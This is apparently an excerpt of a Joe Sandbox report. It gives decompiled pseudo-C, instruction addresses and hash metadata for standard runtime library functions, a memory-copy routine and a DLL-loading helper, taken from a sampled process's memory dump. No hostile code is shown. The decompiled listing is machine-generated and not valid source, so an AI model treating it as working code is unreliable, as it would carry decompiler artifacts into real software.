										E011921B0(_t196, _t222, _t241, _t258, _v12);
										E01194EA0();
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t241);
										_push(_t258);
										_t260 = _v36;
										_t206 = _v32;
										_t243 = _v40;
										_t165 = _t260 + _t206;
										__eflags = _t243 - _t260;
										if(_t243 <= _t260) {
											L25:
											__eflags = _t206 - 0x20;
											if(_t206 < 0x20) {
												L96:
												_t207 = _t206 & 0x0000001f;
												__eflags = _t207;
												if(_t207 != 0) {
													_t167 = _t207;
													_t208 = _t207 >> 2;
													__eflags = _t208;
													while(_t208 != 0) {
														 *_t243 =  *_t260;
														_t243 = _t243 + 4;
														_t260 = _t260 + 4;
														_t208 = _t208 - 1;
														__eflags = _t208;
													}
													_t210 = _t167 & 0x00000003;
													__eflags = _t210;
													while(_t210 != 0) {
														 *_t243 =  *_t260;
														_t260 = _t260 + 1;
														_t243 = _t243 + 1;
														_t210 = _t210 - 1;
														__eflags = _t210;
													}
												}
												goto L102;
											} else {
												__eflags = _t206 - 0x80;
												if(__eflags >= 0) {
													asm("bt dword [0x11a8d0c], 0x1");
													if(__eflags >= 0) {
														__eflags = (_t243 ^ _t260) & 0x0000000f;
														if(__eflags != 0) {
															L33:
															asm("bt dword [0x11a8d0c], 0x0");
															if(__eflags >= 0) {
																goto L58;
															} else {
																__eflags = _t243 & 0x00000003;
																if((_t243 & 0x00000003) != 0) {
																	goto L58;
																} else {
																	__eflags = _t260 & 0x00000003;
																	if(__eflags == 0) {
																		asm("bt edi, 0x2");
																		if(__eflags < 0) {
																			_t176 =  *_t260;
																			_t206 = _t206 - 4;
																			__eflags = _t206;
																			_t260 = _t260 + 4;
																			 *_t243 = _t176;
																			_t58 = _t243 + 4; // 0xc033a47d
																			_t243 = _t58;
																		}
																		asm("bt edi, 0x3");
																		if(__eflags < 0) {
																			asm("movq xmm1, [esi]");
																			_t206 = _t206 - 8;
																			__eflags = _t206;
																			_t260 = _t260 + 8;
																			asm("movq [edi], xmm1");
																			_t60 = _t243 + 8; // 0x8498bab
																			_t243 = _t60;
																		}
																		__eflags = _t260 & 0x00000007;
																		if(__eflags == 0) {
																			asm("movdqa xmm1, [esi-0x8]");
																			_t263 = _t260 - 8;
																			do {
																				asm("movdqa xmm3, [esi+0x10]");
																				_t206 = _t206 - 0x30;
																				asm("movdqa xmm0, [esi+0x20]");
																				asm("movdqa xmm5, [esi+0x30]");
																				_t263 = _t263 + 0x30;
																				__eflags = _t206 - 0x30;
																				asm("movdqa xmm2, xmm3");
																				asm("palignr xmm3, xmm1, 0x8");
																				asm("movdqa [edi], xmm3");
																				asm("movdqa xmm4, xmm0");
																				asm("palignr xmm0, xmm2, 0x8");
																				asm("movdqa [edi+0x10], xmm0");
																				asm("movdqa xmm1, xmm5");
																				asm("palignr xmm5, xmm4, 0x8");
																				asm("movdqa [edi+0x20], xmm5");
																				_t69 = _t243 + 0x30; // 0x1
																				_t243 = _t69;
																			} while (_t206 >= 0x30);
																			_t260 = _t263 + 8;
																		} else {
																			asm("bt esi, 0x3");
																			if(__eflags >= 0) {
																				asm("movdqa xmm1, [esi-0x4]");
																				_t264 = _t260 - 4;
																				do {
																					asm("movdqa xmm3, [esi+0x10]");
																					_t206 = _t206 - 0x30;
																					asm("movdqa xmm0, [esi+0x20]");
																					asm("movdqa xmm5, [esi+0x30]");
																					_t264 = _t264 + 0x30;
																					__eflags = _t206 - 0x30;
																					asm("movdqa xmm2, xmm3");
																					asm("palignr xmm3, xmm1, 0x4");
																					asm("movdqa [edi], xmm3");
																					asm("movdqa xmm4, xmm0");
																					asm("palignr xmm0, xmm2, 0x4");
																					asm("movdqa [edi+0x10], xmm0");
																					asm("movdqa xmm1, xmm5");
																					asm("palignr xmm5, xmm4, 0x4");
																					asm("movdqa [edi+0x20], xmm5");
																					_t73 = _t243 + 0x30; // 0x1
																					_t243 = _t73;
																				} while (_t206 >= 0x30);
																				_t260 = _t264 + 4;
																				while(1) {
																					L51:
																					__eflags = _t206 - 0x10;
																					if(__eflags < 0) {
																						break;
																					}
																					asm("movdqu xmm1, [esi]");
																					_t206 = _t206 - 0x10;
																					_t260 = _t260 + 0x10;
																					asm("movdqa [edi], xmm1");
																					_t243 = _t243 + 0x10;
																				}
																				asm("bt ecx, 0x2");
																				if(__eflags < 0) {
																					_t175 =  *_t260;
																					_t206 = _t206 - 4;
																					__eflags = _t206;
																					_t260 = _t260 + 4;
																					 *_t243 = _t175;
																					_t243 = _t243 + 4;
																				}
																				asm("bt ecx, 0x3");
																				if(__eflags < 0) {
																					asm("movq xmm1, [esi]");
																					__eflags = _t206;
																					_t260 = _t260 + 8;
																					asm("movq [edi], xmm1");
																					_t243 = _t243 + 8;
																				}
																				goto __eax;
																			}
																			asm("movdqa xmm1, [esi-0xc]");
																			_t265 = _t260 - 0xc;
																			do {
																				asm("movdqa xmm3, [esi+0x10]");
																				_t206 = _t206 - 0x30;
																				asm("movdqa xmm0, [esi+0x20]");
																				asm("movdqa xmm5, [esi+0x30]");
																				_t265 = _t265 + 0x30;
																				__eflags = _t206 - 0x30;
																				asm("movdqa xmm2, xmm3");
																				asm("palignr xmm3, xmm1, 0xc");
																				asm("movdqa [edi], xmm3");
																				asm("movdqa xmm4, xmm0");
																				asm("palignr xmm0, xmm2, 0xc");
																				asm("movdqa [edi+0x10], xmm0");
																				asm("movdqa xmm1, xmm5");
																				asm("palignr xmm5, xmm4, 0xc");
																				asm("movdqa [edi+0x20], xmm5");
																				_t65 = _t243 + 0x30; // 0x1
																				_t243 = _t65;
																			} while (_t206 >= 0x30);
																			_t66 = _t265 + 0xc; // 0x86ac3c9
																			_t260 = _t66;
																		}
																		goto L51;
																	}
																}
															}
															goto L60;
														} else {
															asm("bt dword [0x11a7218], 0x1");
															if(__eflags < 0) {
																_t178 = _t260 & 0x0000000f;
																__eflags = _t178;
																if(_t178 != 0) {
																	_push(_t206 - 0x10);
																	_t179 = 0x10 - _t178;
																	_t215 = _t179 & 0x00000003;
																	__eflags = _t215;
																	while(_t215 != 0) {
																		 *_t243 =  *_t260;
																		_t260 = _t260 + 1;
																		_t243 = _t243 + 1;
																		_t215 = _t215 - 1;
																		__eflags = _t215;
																	}
																	_t180 = _t179 >> 2;
																	__eflags = _t180;
																	while(_t180 != 0) {
																		 *_t243 =  *_t260;
																		_t260 = _t260 + 4;
																		_t144 = _t243 + 4; // 0xabc033a4
																		_t243 = _t144;
																		_t180 = _t180 - 1;
																		__eflags = _t180;
																	}
																	_pop(_t206);
																}
																_t230 = _t206;
																_t206 = _t206 & 0x0000007f;
																_t231 = _t230 >> 7;
																__eflags = _t231;
																while(_t231 != 0) {
																	asm("movdqa xmm0, [esi]");
																	asm("movdqa xmm1, [esi+0x10]");
																	asm("movdqa xmm2, [esi+0x20]");
																	asm("movdqa xmm3, [esi+0x30]");
																	asm("movdqa [edi], xmm0");
																	asm("movdqa [edi+0x10], xmm1");
																	asm("movdqa [edi+0x20], xmm2");
																	asm("movdqa [edi+0x30], xmm3");
																	asm("movdqa xmm4, [esi+0x40]");
																	asm("movdqa xmm5, [esi+0x50]");
																	asm("movdqa xmm6, [esi+0x60]");
																	asm("movdqa xmm7, [esi+0x70]");
																	asm("movdqa [edi+0x40], xmm4");
																	asm("movdqa [edi+0x50], xmm5");
																	asm("movdqa [edi+0x60], xmm6");
																	asm("movdqa [edi+0x70], xmm7");
																	_t260 = _t260 + 0x80;
																	_t139 = _t243 + 0x80; // 0x11a7968
																	_t243 = _t139;
																	_t231 = _t231 - 1;
																	__eflags = _t231;
																}
																goto L92;
															} else {
																goto L33;
															}
														}
													} else {
														memcpy(_t243, _t260, _t206);
														return _v40;
													}
												} else {
													asm("bt dword [0x11a7218], 0x1");
													if(__eflags < 0) {
														L92:
														__eflags = _t206;
														if(_t206 != 0) {
															_t233 = _t206 >> 5;
															__eflags = _t233;
															if(_t233 != 0) {
																do {
																	asm("movdqu xmm0, [esi]");
																	asm("movdqu xmm1, [esi+0x10]");
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm1");
																	_t260 = _t260 + 0x20;
																	_t141 = _t243 + 0x20; // 0x0
																	_t243 = _t141;
																	_t233 = _t233 - 1;
																	__eflags = _t233;
																} while (_t233 != 0);
															}
															goto L96;
														}
														L102:
														return _v40;
													} else {
														L58:
														__eflags = _t243 & 0x00000003;
														while((_t243 & 0x00000003) != 0) {
															 *_t243 =  *_t260;
															_t206 = _t206 - 1;
															_t260 = _t260 + 1;
															_t243 = _t243 + 1;
															__eflags = _t243 & 0x00000003;
														}
														L60:
														_t226 = _t206;
														__eflags = _t206 - 0x20;
														if(_t206 < 0x20) {
															goto L96;
														} else {
															memcpy(_t243, _t260, _t206 >> 2 << 2);
															switch( *((intOrPtr*)((_t226 & 0x00000003) * 4 +  &M011925B4))) {
																case 0:
																	return _v40;
																	goto L108;
																case 1:
																	 *__edi =  *__esi;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 2:
																	 *__edi =  *__esi;
																	_t92 = __esi + 1; // 0xc0330cc4
																	 *((char*)(__edi + 1)) =  *_t92;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 3:
																	 *__edi =  *__esi;
																	 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
																	 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
															}
														}
													}
												}
											}
										} else {
											__eflags = _t243 - _t165;
											if(_t243 < _t165) {
												_t267 = _t260 + _t206;
												_t251 = _t243 + _t206;
												__eflags = _t206 - 0x20;
												if(__eflags < 0) {
													L83:
													__eflags = _t206 & 0xfffffffc;
													while((_t206 & 0xfffffffc) != 0) {
														_t251 = _t251 - 4;
														_t267 = _t267 - 4;
														 *_t251 =  *_t267;
														_t206 = _t206 - 4;
														__eflags = _t206 & 0xfffffffc;
													}
													__eflags = _t206;
													if(_t206 != 0) {
														do {
															_t251 = _t251 - 1;
															_t267 = _t267 - 1;
															 *_t251 =  *_t267;
															_t206 = _t206 - 1;
															__eflags = _t206;
														} while (_t206 != 0);
													}
													return _v40;
												} else {
													asm("bt dword [0x11a7218], 0x1");
													if(__eflags < 0) {
														__eflags = _t251 & 0x0000000f;
														if((_t251 & 0x0000000f) != 0) {
															do {
																_t206 = _t206 - 1;
																_t267 = _t267 - 1;
																_t251 = _t251 - 1;
																 *_t251 =  *_t267;
																__eflags = _t251 & 0x0000000f;
															} while ((_t251 & 0x0000000f) != 0);
															while(1) {
																L79:
																__eflags = _t206 - 0x80;
																if(_t206 < 0x80) {
																	break;
																}
																_t267 = _t267 - 0x80;
																_t251 = _t251 - 0x80;
																asm("movdqu xmm0, [esi]");
																asm("movdqu xmm1, [esi+0x10]");
																asm("movdqu xmm2, [esi+0x20]");
																asm("movdqu xmm3, [esi+0x30]");
																asm("movdqu xmm4, [esi+0x40]");
																asm("movdqu xmm5, [esi+0x50]");
																asm("movdqu xmm6, [esi+0x60]");
																asm("movdqu xmm7, [esi+0x70]");
																asm("movdqu [edi], xmm0");
																asm("movdqu [edi+0x10], xmm1");
																asm("movdqu [edi+0x20], xmm2");
																asm("movdqu [edi+0x30], xmm3");
																asm("movdqu [edi+0x40], xmm4");
																asm("movdqu [edi+0x50], xmm5");
																asm("movdqu [edi+0x60], xmm6");
																asm("movdqu [edi+0x70], xmm7");
																_t206 = _t206 - 0x80;
																__eflags = _t206 & 0xffffff80;
																if((_t206 & 0xffffff80) != 0) {
																	continue;
																}
																break;
															}
															__eflags = _t206 - 0x20;
															if(_t206 >= 0x20) {
																do {
																	_t267 = _t267 - 0x20;
																	_t251 = _t251 - 0x20;
																	asm("movdqu xmm0, [esi]");
																	asm("movdqu xmm1, [esi+0x10]");
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm1");
																	_t206 = _t206 - 0x20;
																	__eflags = _t206 & 0xffffffe0;
																} while ((_t206 & 0xffffffe0) != 0);
															}
															goto L83;
														}
														goto L79;
													} else {
														__eflags = _t251 & 0x00000003;
														if((_t251 & 0x00000003) != 0) {
															_t239 = _t251 & 0x00000003;
															_t206 = _t206 - _t239;
															__eflags = _t206;
															do {
																 *(_t251 - 1) =  *((intOrPtr*)(_t267 - 1));
																_t267 = _t267 - 1;
																_t251 = _t251 - 1;
																_t239 = _t239 - 1;
																__eflags = _t239;
															} while (_t239 != 0);
														}
														__eflags = _t206 - 0x20;
														if(_t206 < 0x20) {
															goto L83;
														} else {
															asm("std");
															memcpy(_t251 - 4, _t267 - 4, _t206 >> 2 << 2);
															asm("cld");
															switch( *((intOrPtr*)((_t206 & 0x00000003) * 4 +  &M01192660))) {
																case 0:
																	return _v40;
																	goto L108;
																case 1:
																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 2:
																	_t113 = __esi + 3; // 0x36ebc033
																	 *((char*)(__edi + 3)) =  *_t113;
																	_t115 = __esi + 2; // 0xebc0330c
																	 *((char*)(__edi + 2)) =  *_t115;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 3:
																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
																	 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
																	 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
															}
														}
													}
												}
											} else {
												goto L25;
											}
										}
									} else {
										goto L7;
									}
								}
							}
							goto L108;
							L7:
							_t241 = _t196;
						} while (_t196 != 0xfffffffe);
						if(_t202 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L108:
			}
























































                                          0x011921f0
                                          0x011921f7
                                          0x011921fb
                                          0x011921fc
                                          0x01192202
                                          0x0119220e
                                          0x01192210
                                          0x01192216
                                          0x01192216
                                          0x0119221f
                                          0x01192221
                                          0x01192224
                                          0x01192227
                                          0x0119222f
                                          0x01192234
                                          0x01192237
                                          0x0119223a
                                          0x01192241
                                          0x0119229d
                                          0x011922a0
                                          0x011922a8
                                          0x011922af
                                          0x00000000
                                          0x011922af
                                          0x00000000
                                          0x01192243
                                          0x01192243
                                          0x01192249
                                          0x0119224f
                                          0x01192255
                                          0x011922c0
                                          0x011922c9
                                          0x01192257
                                          0x01192257
                                          0x01192257
                                          0x0119225d
                                          0x01192260
                                          0x01192263
                                          0x01192266
                                          0x01192269
                                          0x0119226e
                                          0x01192284
                                          0x00000000
                                          0x01192270
                                          0x01192270
                                          0x01192272
                                          0x01192277
                                          0x01192279
                                          0x0119227c
                                          0x0119227e
                                          0x01192294
                                          0x011922b4
                                          0x011922b4
                                          0x011922b8
                                          0x00000000
                                          0x01192280
                                          0x01192280
                                          0x011922ca
                                          0x011922cd
                                          0x011922d3
                                          0x011922d5
                                          0x011922dc
                                          0x011922e3
                                          0x011922e8
                                          0x011922eb
                                          0x011922ed
                                          0x011922ef
                                          0x011922fc
                                          0x01192302
                                          0x01192304
                                          0x01192307
                                          0x01192307
                                          0x0119230a
                                          0x0119230a
                                          0x011922dc
                                          0x01192310
                                          0x01192312
                                          0x01192317
                                          0x0119231a
                                          0x0119231d
                                          0x01192325
                                          0x01192329
                                          0x0119232e
                                          0x0119232e
                                          0x01192331
                                          0x01192335
                                          0x01192338
                                          0x01192348
                                          0x0119234d
                                          0x0119234e
                                          0x0119234f
                                          0x01192350
                                          0x01192351
                                          0x01192352
                                          0x01192356
                                          0x0119235a
                                          0x01192362
                                          0x01192364
                                          0x01192366
                                          0x01192370
                                          0x01192370
                                          0x01192373
                                          0x0119284b
                                          0x0119284b
                                          0x0119284b
                                          0x0119284e
                                          0x01192850
                                          0x01192852
                                          0x01192852
                                          0x01192855
                                          0x01192859
                                          0x0119285b
                                          0x0119285e
                                          0x01192861
                                          0x01192861
                                          0x01192861
                                          0x01192868
                                          0x01192868
                                          0x0119286b
                                          0x0119286f
                                          0x01192871
                                          0x01192872
                                          0x01192873
                                          0x01192873
                                          0x01192873
                                          0x0119286b
                                          0x00000000
                                          0x01192379
                                          0x01192379
                                          0x0119237f
                                          0x01192394
                                          0x0119239c
                                          0x011923ab
                                          0x011923b0
                                          0x011923c0
                                          0x011923c0
                                          0x011923c8
                                          0x00000000
                                          0x011923ce
                                          0x011923ce
                                          0x011923d4
                                          0x00000000
                                          0x011923da
                                          0x011923da
                                          0x011923e0
                                          0x011923e6
                                          0x011923ea
                                          0x011923ec
                                          0x011923ee
                                          0x011923ee
                                          0x011923f1
                                          0x011923f4
                                          0x011923f6
                                          0x011923f6
                                          0x011923f6
                                          0x011923f9
                                          0x011923fd
                                          0x011923ff
                                          0x01192403
                                          0x01192403
                                          0x01192406
                                          0x01192409
                                          0x0119240d
                                          0x0119240d
                                          0x0119240d
                                          0x01192410
                                          0x01192416
                                          0x0119247d
                                          0x01192482
                                          0x01192488
                                          0x01192488
                                          0x0119248d
                                          0x01192490
                                          0x01192495
                                          0x0119249a
                                          0x0119249d
                                          0x011924a0
                                          0x011924a4
                                          0x011924aa
                                          0x011924ae
                                          0x011924b2
                                          0x011924b8
                                          0x011924bd
                                          0x011924c1
                                          0x011924c7
                                          0x011924cc
                                          0x011924cc
                                          0x011924cc
                                          0x011924d1
                                          0x01192418
                                          0x01192418
                                          0x0119241c
                                          0x011924d6
                                          0x011924db
                                          0x011924e0
                                          0x011924e0
                                          0x011924e5
                                          0x011924e8
                                          0x011924ed
                                          0x011924f2
                                          0x011924f5
                                          0x011924f8
                                          0x011924fc
                                          0x01192502
                                          0x01192506
                                          0x0119250a
                                          0x01192510
                                          0x01192515
                                          0x01192519
                                          0x0119251f
                                          0x01192524
                                          0x01192524
                                          0x01192524
                                          0x01192529
                                          0x0119252c
                                          0x0119252c
                                          0x0119252c
                                          0x0119252f
                                          0x00000000
                                          0x00000000
                                          0x01192531
                                          0x01192535
                                          0x01192538
                                          0x0119253b
                                          0x0119253f
                                          0x0119253f
                                          0x01192544
                                          0x01192548
                                          0x0119254a
                                          0x0119254c
                                          0x0119254c
                                          0x0119254f
                                          0x01192552
                                          0x01192554
                                          0x01192554
                                          0x01192557
                                          0x0119255b
                                          0x0119255d
                                          0x01192561
                                          0x01192564
                                          0x01192567
                                          0x0119256b
                                          0x0119256b
                                          0x01192575
                                          0x01192575
                                          0x01192422
                                          0x01192427
                                          0x0119242c
                                          0x0119242c
                                          0x01192431
                                          0x01192434
                                          0x01192439
                                          0x0119243e
                                          0x01192441
                                          0x01192444
                                          0x01192448
                                          0x0119244e
                                          0x01192452
                                          0x01192456
                                          0x0119245c
                                          0x01192461
                                          0x01192465
                                          0x0119246b
                                          0x01192470
                                          0x01192470
                                          0x01192470
                                          0x01192475
                                          0x01192475
                                          0x01192475
                                          0x00000000
                                          0x01192416
                                          0x011923e0
                                          0x011923d4
                                          0x00000000
                                          0x011923b2
                                          0x011923b2
                                          0x011923ba
                                          0x011927a2
                                          0x011927a5
                                          0x011927a7
                                          0x01192899
                                          0x0119289a
                                          0x0119289e
                                          0x0119289e
                                          0x011928a1
                                          0x011928a5
                                          0x011928a7
                                          0x011928a8
                                          0x011928a9
                                          0x011928a9
                                          0x011928a9
                                          0x011928ac
                                          0x011928ac
                                          0x011928af
                                          0x011928b3
                                          0x011928b5
                                          0x011928b8
                                          0x011928b8
                                          0x011928bb
                                          0x011928bb
                                          0x011928bb
                                          0x011928be
                                          0x011928be
                                          0x011927ad
                                          0x011927af
                                          0x011927b2
                                          0x011927b2
                                          0x011927b5
                                          0x011927c0
                                          0x011927c4
                                          0x011927c9
                                          0x011927ce
                                          0x011927d3
                                          0x011927d7
                                          0x011927dc
                                          0x011927e1
                                          0x011927e6
                                          0x011927eb
                                          0x011927f0
                                          0x011927f5
                                          0x011927fa
                                          0x011927ff
                                          0x01192804
                                          0x01192809
                                          0x0119280e
                                          0x01192814
                                          0x01192814
                                          0x0119281a
                                          0x0119281a
                                          0x0119281a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011923ba
                                          0x0119239e
                                          0x0119239e
                                          0x011923a6
                                          0x011923a6
                                          0x01192381
                                          0x01192381
                                          0x01192389
                                          0x0119281d
                                          0x0119281d
                                          0x0119281f
                                          0x01192823
                                          0x01192826
                                          0x01192828
                                          0x01192830
                                          0x01192830
                                          0x01192834
                                          0x01192839
                                          0x0119283d
                                          0x01192842
                                          0x01192845
                                          0x01192845
                                          0x01192848
                                          0x01192848
                                          0x01192848
                                          0x01192830
                                          0x00000000
                                          0x01192828
                                          0x01192880
                                          0x01192886
                                          0x0119238f
                                          0x01192577
                                          0x01192577
                                          0x0119257d
                                          0x01192581
                                          0x01192583
                                          0x01192584
                                          0x01192587
                                          0x0119258a
                                          0x0119258a
                                          0x01192592
                                          0x01192592
                                          0x01192594
                                          0x01192597
                                          0x00000000
                                          0x0119259d
                                          0x011925a0
                                          0x011925a5
                                          0x00000000
                                          0x011925ca
                                          0x00000000
                                          0x00000000
                                          0x011925ce
                                          0x011925d0
                                          0x011925d4
                                          0x011925d5
                                          0x011925d6
                                          0x00000000
                                          0x00000000
                                          0x011925da
                                          0x011925dc
                                          0x011925df
                                          0x011925e2
                                          0x011925e6
                                          0x011925e7
                                          0x011925e8
                                          0x00000000
                                          0x00000000
                                          0x011925ee
                                          0x011925f3
                                          0x011925f9
                                          0x011925fc
                                          0x01192600
                                          0x01192601
                                          0x01192602
                                          0x00000000
                                          0x00000000
                                          0x011925a5
                                          0x01192597
                                          0x01192389
                                          0x0119237f
                                          0x01192368
                                          0x01192368
                                          0x0119236a
                                          0x01192604
                                          0x01192607
                                          0x0119260a
                                          0x0119260d
                                          0x01192764
                                          0x01192764
                                          0x0119276a
                                          0x0119276c
                                          0x0119276f
                                          0x01192774
                                          0x01192776
                                          0x01192779
                                          0x01192779
                                          0x01192781
                                          0x01192783
                                          0x01192785
                                          0x01192785
                                          0x01192788
                                          0x0119278d
                                          0x0119278f
                                          0x0119278f
                                          0x0119278f
                                          0x01192785
                                          0x0119279a
                                          0x01192613
                                          0x01192613
                                          0x0119261b
                                          0x011926b5
                                          0x011926bb
                                          0x011926bd
                                          0x011926bd
                                          0x011926be
                                          0x011926bf
                                          0x011926c2
                                          0x011926c4
                                          0x011926c4
                                          0x011926cc
                                          0x011926cc
                                          0x011926cc
                                          0x011926d2
                                          0x00000000
                                          0x00000000
                                          0x011926d4
                                          0x011926da
                                          0x011926e0
                                          0x011926e4
                                          0x011926e9
                                          0x011926ee
                                          0x011926f3
                                          0x011926f8
                                          0x011926fd
                                          0x01192702
                                          0x01192707
                                          0x0119270b
                                          0x01192710
                                          0x01192715
                                          0x0119271a
                                          0x0119271f
                                          0x01192724
                                          0x01192729
                                          0x0119272e
                                          0x01192734
                                          0x0119273a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119273a
                                          0x0119273c
                                          0x0119273f
                                          0x01192741
                                          0x01192741
                                          0x01192744
                                          0x01192747
                                          0x0119274b
                                          0x01192750
                                          0x01192754
                                          0x01192759
                                          0x0119275c
                                          0x0119275c
                                          0x01192741
                                          0x00000000
                                          0x0119273f
                                          0x00000000
                                          0x01192621
                                          0x01192621
                                          0x01192627
                                          0x0119262b
                                          0x0119262e
                                          0x0119262e
                                          0x01192630
                                          0x01192633
                                          0x01192636
                                          0x01192637
                                          0x01192638
                                          0x01192638
                                          0x01192638
                                          0x01192630
                                          0x0119263d
                                          0x01192640
                                          0x00000000
                                          0x01192646
                                          0x01192654
                                          0x01192655
                                          0x01192657
                                          0x01192658
                                          0x00000000
                                          0x01192676
                                          0x00000000
                                          0x00000000
                                          0x0119267b
                                          0x0119267e
                                          0x01192682
                                          0x01192683
                                          0x01192684
                                          0x00000000
                                          0x00000000
                                          0x01192688
                                          0x0119268b
                                          0x0119268e
                                          0x01192691
                                          0x01192694
                                          0x01192698
                                          0x01192699
                                          0x0119269a
                                          0x00000000
                                          0x00000000
                                          0x0119269f
                                          0x011926a5
                                          0x011926ab
                                          0x011926ae
                                          0x011926b2
                                          0x011926b3
                                          0x011926b4
                                          0x00000000
                                          0x00000000
                                          0x01192658
                                          0x01192640
                                          0x0119261b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119236a
                                          0x01192282
                                          0x00000000
                                          0x01192282
                                          0x01192280
                                          0x0119227e
                                          0x00000000
                                          0x01192287
                                          0x01192287
                                          0x01192289
                                          0x01192290
                                          0x00000000
                                          0x01192292
                                          0x00000000
                                          0x01192290
                                          0x01192255
                                          0x00000000

                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 01192227
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0119222F
                                          • _ValidateLocalCookies.LIBCMT ref: 011922B8
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 011922E3
                                          • _ValidateLocalCookies.LIBCMT ref: 01192338
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 105275f8952b5e5137c46f9b0472aef5db9959760627ca5b3bd37ab8af9a23d7
                                          • Instruction ID: 736b88446b783184c5e07a5894390c6ce887ed54036ac88787ad58db49de0cc0
                                          • Opcode Fuzzy Hash: 105275f8952b5e5137c46f9b0472aef5db9959760627ca5b3bd37ab8af9a23d7
                                          • Instruction Fuzzy Hash: 2F41D338E00219ABCF18DFA8C880A9EBFB5FF44328F148095E9345B391D735EA15CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119521C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0119521C(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x11a9228 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x11a06a8 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E0119724E(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E0119724E(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}













                                          0x01195225
                                          0x011952cf
                                          0x0119522d
                                          0x0119522f
                                          0x01195236
                                          0x01195238
                                          0x0119523e
                                          0x0119524b
                                          0x01195260
                                          0x01195264
                                          0x011952b6
                                          0x011952b6
                                          0x011952bb
                                          0x011952bf
                                          0x011952c2
                                          0x011952c2
                                          0x011952c8
                                          0x011952ca
                                          0x011952df
                                          0x011952da
                                          0x011952de
                                          0x011952de
                                          0x011952cc
                                          0x011952cc
                                          0x00000000
                                          0x011952cc
                                          0x01195266
                                          0x0119526f
                                          0x011952a6
                                          0x011952a6
                                          0x011952a8
                                          0x011952aa
                                          0x00000000
                                          0x00000000
                                          0x011952b2
                                          0x00000000
                                          0x011952b2
                                          0x01195279
                                          0x0119527e
                                          0x01195283
                                          0x00000000
                                          0x00000000
                                          0x0119528d
                                          0x01195292
                                          0x01195297
                                          0x00000000
                                          0x00000000
                                          0x0119529c
                                          0x011952a2
                                          0x00000000
                                          0x011952a2
                                          0x01195243
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01195249
                                          0x011952d8
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
